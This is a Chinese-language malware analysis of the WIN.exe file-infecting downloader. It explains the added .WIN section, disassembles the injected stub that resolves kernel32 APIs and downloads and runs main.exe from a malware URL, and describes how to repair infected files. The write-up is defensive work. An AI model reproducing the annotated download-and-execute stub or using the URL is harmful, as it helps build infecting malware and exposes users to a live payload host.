感染型下载者WIN.exe部分行为分析(下)

二、被感染文件中加入的内容及其行为分析
程序被感染后，加入一个.WIN节，入口点指向其中
最前面0C5的内容是“数据区”，其中可明显看出有意义的部分，包括以下内容（以下地址为相对.WIN节头的偏移）：
***************************************************************************************************
1. 预留空间保存变量（在被感染程序运行时，先运行的代码会向这部分写入数据）
+00H   urlmon的基址
+04H   GetProcAddress函数地址
+08H   LoadLibraryA函数地址
+0CH   FreeLibrary函数地址
+10H   ExitProcess函数地址
+14H   GetModuleHandleA函数地址
+18H   URLDownloadToFileA函数地址
+1CH   WinExec函数地址
2. 用到的字符串常量：
+20H   "LoadLibraryA",0
+2DH   "FreeLibrary",0
+39H   "ExitProcess",0
+45H   "GetModuleHandleA",0
+56H   "WinExec",0
+5FH   "urlmon",0
+66H   "URLDownloadToFileA",0
+79H   "http://ttt.wokaon.cn/main.exe",0
+97H   "c:\Program Files\Common Files\WIN.exe",0
……………………
3. 保存的程序原基址和入口点，代码执行后读取这里，并跳回原入口点执行。要修复被感染文件，也要知道这两个值：
+BDH   程序原ImageBase
+C1H   程序原AddressOfEntryPoint
***************************************************************************************************
+C5H开始，将是加入的代码（病毒主文件内存中的13152BF8到13152D88的内容）
我直接在病毒主文件里面看了，OD里反汇编分析了下，大致如下：
13152C04是入口。
***************************************************************************************************
13152BFD 58              pop     eax                                     ; pop得到EIP，即此句代码位置
13152BFE 83E8 05       sub     eax, 5                                  ; call代码的位置
13152C01 C3              retn
13152C02 8BC0          mov     eax, eax
13152C04 55              push ebp                                     ; 入口
13152C05 8BEC          mov     ebp, esp
13152C07 83C4 EC       add     esp, -14
13152C0A 53              push ebx
13152C0B 56              push esi
13152C0C 57              push edi
13152C0D 8D75 FC       lea     esi, dword ptr [ebp-4]                   ; 程序初始化时，堆栈中的指向kernel32.dll内的一个地址
***************************************************************************************************
接下来一段是花指令：
***************************************************************************************************
13152C10 EB 01           jmp     short 13152C13
13152C12 90              nop                                              ; 原是E8，是加花
13152C13 90              nop
13152C14 90              nop
13152C15 90              nop
13152C16 90              nop
13152C17 90              nop
13152C18 90              nop
13152C19 EB 01           jmp     short 13152C1C
13152C1B 90              nop                                              ; 原是E8，是加花
13152C1C 90              nop
13152C1D 90              nop
***************************************************************************************************
下面才接着又是有意义的：
***************************************************************************************************
13152C1E /EB 0F           jmp     short 13152C2F
13152C20 |8138 4D5A9000 cmp     dword ptr [eax], 905A4D                    ; 找kernel32.dll的MZ头，定位其基址
13152C26 |74 12           je    short 13152C3A                             ; 找到后跳出，这时eax为kernel32.dll的基址
13152C28 |2D 00100000     sub     eax, 1000
13152C2D   ^|EB F1           jmp     short 13152C20
13152C2F \8B4424 14    mov     eax, dword ptr [esp+14]
13152C33 25 0000FFFF     and     eax, FFFF0000
13152C38   ^ EB E6           jmp     short 13152C20
13152C3A 8945 FC       mov     dword ptr [ebp-4], eax                   ; 保存kernel32.dll基址
***************************************************************************************************
通过程序初始化时留在堆栈中的一个指向kernel32.dll内部的地址，循环后退找kernel32.dll的DOS文件头（MZ）所在位置，从而定位kernel32.dll的基址
***************************************************************************************************
13152C3D E8 B6FFFFFF     call 13152BF8                                   ; 定位代码位置
13152C42 2D C5000000     sub     eax, 0C5                                   ; eax=.WIN节头
13152C47 8945 F4       mov     dword ptr [ebp-C], eax                   ; 保存.WIN节头地址
***************************************************************************************************
call到的子函数看前面，通过一个虚假的call来诱使EIP入栈，再pop出来，从而在内存中定位了自己的代码位置，确定了.WIN节头地址，从而在读写前面C5H大小的数据区时就有目标了。
***************************************************************************************************
13152C4A 8B06          mov     eax, dword ptr [esi]                       ; esi=ebp-4，此时为kernel32.dll基址
13152C4C 8B40 3C       mov     eax, dword ptr [eax+3C]                    ; MZ头地址+3C,PE头地址
13152C4F 0306          add     eax, dword ptr [esi]
13152C51 8B40 78       mov     eax, dword ptr [eax+78]                    ; PE偏移78H,DataDirectory开头，输出表地址
13152C54 0306          add     eax, dword ptr [esi]
13152C56 8BC8          mov     ecx, eax                                   ; ecx=输出表VA
13152C58 8B51 20       mov     edx, dword ptr [ecx+20]                    ; AddressOfNames
13152C5B 0316          add     edx, dword ptr [esi]
13152C5D 8B59 24       mov     ebx, dword ptr [ecx+24]                    ; AddressOfNameOrdinals
13152C60 031E          add     ebx, dword ptr [esi]
13152C62 895D F0       mov     dword ptr [ebp-10], ebx                    ; AddressOfNameOrdinals
13152C65 8B59 1C       mov     ebx, dword ptr [ecx+1C]                    ; AddressOfFunctions
13152C68 031E          add     ebx, dword ptr [esi]
13152C6A 895D EC       mov     dword ptr [ebp-14], ebx                    ; AddressOfFunctions
13152C6D 8B41 18       mov     eax, dword ptr [ecx+18]                    ; NumberOfNames
13152C70 8BC8          mov     ecx, eax
13152C72 49              dec     ecx
13152C73 85C9          test ecx, ecx
13152C75 72 5A           jb    short 13152CD1
13152C77 41              inc     ecx
***************************************************************************************************
这里用到PE文件的知识了，通过读取kernel32.dll的PE文件结构，找到并读取其输出表，目的，当然是为了在输出表里检索函数。
***************************************************************************************************
13152C78 33C0          xor     eax, eax
13152C7A 8BD8          mov     ebx, eax                                   ; eax=第几个函数（0开始）此处为循环，目的是为了找到GetProcAddressA函数的地址
13152C7C C1E3 02       shl     ebx, 2                                  ; ebx*4
13152C7F 03DA          add     ebx, edx                                   ; edx=AddressOfNames
13152C81 8B3B          mov     edi, dword ptr [ebx]
13152C83 033E          add     edi, dword ptr [esi]
13152C85 813F 47657450 cmp     dword ptr [edi], 50746547                ; GetP
13152C8B 75 40           jnz     short 13152CCD
13152C8D 8BDF          mov     ebx, edi
13152C8F 83C3 04       add     ebx, 4
13152C92 813B 726F6341 cmp     dword ptr [ebx], 41636F72                ; rocA
13152C98 75 33           jnz     short 13152CCD
13152C9A 8BDF          mov     ebx, edi
13152C9C 83C3 08       add     ebx, 8
13152C9F 813B 64647265 cmp     dword ptr [ebx], 65726464                ; ddre
13152CA5 75 26           jnz     short 13152CCD
13152CA7 83C7 0C       add     edi, 0C
13152CAA 66:813F 7373 cmp     word ptr [edi], 7373                       ; ss
13152CAF 75 1C           jnz     short 13152CCD
13152CB1 8BD0          mov     edx, eax
13152CB3 03D2          add     edx, edx
13152CB5 0355 F0       add     edx, dword ptr [ebp-10]                    ; AddressOfNameOrdinals
13152CB8 0FB712       movzx edx, word ptr [edx]
13152CBB C1E2 02       shl     edx, 2
13152CBE 0355 EC       add     edx, dword ptr [ebp-14]                    ; AddressOfFunctions
13152CC1 8B12          mov     edx, dword ptr [edx]
13152CC3 0316          add     edx, dword ptr [esi]                       ; edx=函数地址
13152CC5 8B4D F4       mov     ecx, dword ptr [ebp-C]                   ; ecx=.WIN段首VA
13152CC8 8951 04       mov     dword ptr [ecx+4], edx                   ; 保存GetProcAddress的VA
13152CCB EB 04           jmp     short 13152CD1
13152CCD 40              inc     eax
13152CCE 49              dec     ecx
13152CCF   ^ 75 A9           jnz     short 13152C7A

***************************************************************************************************
循环查找输出表，找到进程空间中GetProcAddress函数的地址
找到这个，又有kernel32.dll的基址，就可以调用GetProcAddress函数获得kernel32.dll中的其他所需函数的地址了：
***************************************************************************************************
13152CD1 8B5D F4       mov     ebx, dword ptr [ebp-C]                   ; .WIN段首VA
13152CD4 8D43 20       lea     eax, dword ptr [ebx+20]                    ; LoadLibraryA
13152CD7 50              push eax
13152CD8 8B06          mov     eax, dword ptr [esi]                       ;
13152CDA 50              push eax
13152CDB FF53 04       call dword ptr [ebx+4]                          ; GetProcAddress
13152CDE 8943 08       mov     dword ptr [ebx+8], eax                   ; [.WIN+8]=LoadLibraryA的入口VA
…………………………………………
13152D08 8D43 56       lea     eax, dword ptr [ebx+56]                    ; WinExec
13152D0B 50              push eax
13152D0C 8B06          mov     eax, dword ptr [esi]
13152D0E 50              push eax
13152D0F FF53 04       call dword ptr [ebx+4]
13152D12 8943 1C       mov     dword ptr [ebx+1C], eax                    ; WinExec
***************************************************************************************************
就这样相继获得了四个由kernel32.dll导出的函数的地址，保存的位置如下（看前面对数据的说明）：
***************************************************************************************************
+04H   GetProcAddress函数地址
+08H   LoadLibraryA函数地址
+0CH   FreeLibrary函数地址
+10H   ExitProcess函数地址
+14H   GetModuleHandleA函数地址
+1CH   WinExec函数地址
***************************************************************************************************
LoadLibraryA函数有了，现在就可以获取urlmon的基址，进而获取URLDownloadToFileA的入口点地址了：
***************************************************************************************************
13152D15 8D43 5F       lea     eax, dword ptr [ebx+5F]                    ; urlmon
13152D18 50              push eax
13152D19 FF53 08       call dword ptr [ebx+8]                          ; LoadLibraryA
13152D1C 8BF0          mov     esi, eax                                   ; esi=urlmon.dll的基址
13152D1E 8933          mov     dword ptr [ebx], esi                       ; 保存于.WIN段首
13152D20 8D43 66       lea     eax, dword ptr [ebx+66]                    ; URLDownloadToFileA
13152D23 50              push eax
13152D24 56              push esi                                     ; urlmon
13152D25 FF53 04       call dword ptr [ebx+4]                          ; GetProcAddress
13152D28 8943 18       mov     dword ptr [ebx+18], eax                    ; 保存URLDownloadToFileA地址
***************************************************************************************************
千辛万苦获得这些地址，当然是为了调用它们。
这个病毒与前段时间的logogogo.exe系列（其实也就是以前的Delf系列）不一样。
logogogo.exe系列的作法，是将病毒主程序内容整个保存在新加的节里，然后用CreateFileA和WriteFile（也是经过上面这样的方式获取到它们的地址）来释放，并用WinExec运行病毒主程序。
而这个病毒，不愧是“下载者”，连主程序也是直接从网上下载（所以有那个URL地址）。
***************************************************************************************************
13152D2B 6A 05           push 5
13152D2D 8D83 97000000 lea     eax, dword ptr [ebx+97]                    ; 病毒主程序本地地址（看上面数据区）
13152D33 50              push eax
13152D34 FF53 1C       call dword ptr [ebx+1C]                      ; WinExec
13152D37 83F8 20       cmp     eax, 20
13152D3A 73 24           jnb     short 13152D60                             ; 运行成功，就不用从网上再下载，不成功，才会接下来下载
13152D3C 6A 00           push 0
13152D3E 6A 00           push 0
13152D40 8D83 97000000 lea     eax, dword ptr [ebx+97]                    ; 病毒主程序本地地址
13152D46 50              push eax
13152D47 8D43 79       lea     eax, dword ptr [ebx+79]                    ; 病毒主程序远程URL地址（看上面数据区）
13152D4A 50              push eax
13152D4B 6A 00           push 0
13152D4D FF53 18       call dword ptr [ebx+18]                      ; URLDownloadToFileA
13152D50 85C0          test eax, eax
13152D52 75 0C           jnz     short 13152D60                             ; 下载不成功，就不WinExec了
13152D54 6A 05           push 5
13152D56 8D83 97000000 lea     eax, dword ptr [ebx+97]                    ; 病毒主程序本地地址
13152D5C 50              push eax
13152D5D FF53 1C       call dword ptr [ebx+1C]                      ; WinExec
***************************************************************************************************
先试着按主程序本地地址，WinExec运行之，成功了，就OK，不成功（病毒主程序不存在），则用URLDownloadToFileA连网下载主程序，下载成功了再WinExec运行之。
至此病毒的功能完成，最后是“擦屁股”（把因需要Load上来的urlmon.dll再free一次）并退出这段代码，跳回被感染程序的原入口点执行：
***************************************************************************************************
13152D60 8B03          mov     eax, dword ptr [ebx]                       ; urlmon基址
13152D62 50              push eax
13152D63 FF53 0C       call dword ptr [ebx+C]                          ; FreeLibrary
13152D66 8B83 BD000000 mov     eax, dword ptr [ebx+BD]                    ; 原文件基址
13152D6C 0383 C1000000 add     eax, dword ptr [ebx+C1]                    ; 原文件入口点
13152D72 8945 F8       mov     dword ptr [ebp-8], eax
13152D75 8B45 F8       mov     eax, dword ptr [ebp-8]
13152D78 FFE0          jmp     eax                                     ; Go!跳回原文件入口点
***************************************************************************************************
代码的最后，并不是代码中直接调用，可能是本身的消息处理函数（由系统调用），收到WM_QUIT消息之后就会ExitProcess
***************************************************************************************************
13152D7A 6A 00           push 0
13152D7C FF53 10       call dword ptr [ebx+10]                      ; ExitProcess
13152D7F 5F              pop     edi
13152D80 5E              pop     esi
13152D81 5B              pop     ebx
13152D82 8BE5          mov     esp, ebp
13152D84 5D              pop     ebp
13152D85 C3              retn
13152D86 8BC0          mov     eax, eax
13152D88 C3              retn
***************************************************************************************************
至此被感染EXE和SCR文件被加入的代码分析完毕。概括起来它要达到的行为：
尝试调用WinExec运行病毒主程序（.WIN+97H处开始，这里为c:\Program Files\Common Files\WIN.exe）
若运行不成功，则调用URLDownloadToFileA从网上下载主程序，再运行（下载地址于.WIN+79H处开始）
最后跳回原程序入口点执行。

三、被感染文件修复方法简要说明
知道了它的行为，特别是原入口点和基址存在哪里，那修复起来就容易了。
先读最后一个IMAGE_SECTION_HEADER结构，看是否是.WIN节，程序EntryPointer是否指向此节内，如果是，则初步可以判断是被感染了。

定位.WIN节开始地址，读取以下量：
+BDH   程序原ImageBase
+C1H   程序原AddressOfEntryPoint

修改PE文件结构
将IMAGE_OPTIONAL_HEADER32中的ImageBase和AddressOfEntryPoint改回
NumberOfSections减1
抹去增加的一个IMAGE_SECTION_HEADER结构
删除最后一个.WIN节的内容等。

*不同的变种，节名和偏移量肯定有所不同，要靠杀软对被添加的代码取特征了。其中，定位到
***************************************************************************************************
13152D66 8B83 BD000000 mov     eax, dword ptr [ebx+BD]                    ; 原文件基址
13152D6C 0383 C1000000 add     eax, dword ptr [ebx+C1]                    ; 原文件入口点
***************************************************************************************************
这两行代码，找到BD000000和C1000000（不同变种可能不同，但是都是类似的两句）这两个偏移量，就可以找到原ImageBase和AddressOfEntryPoint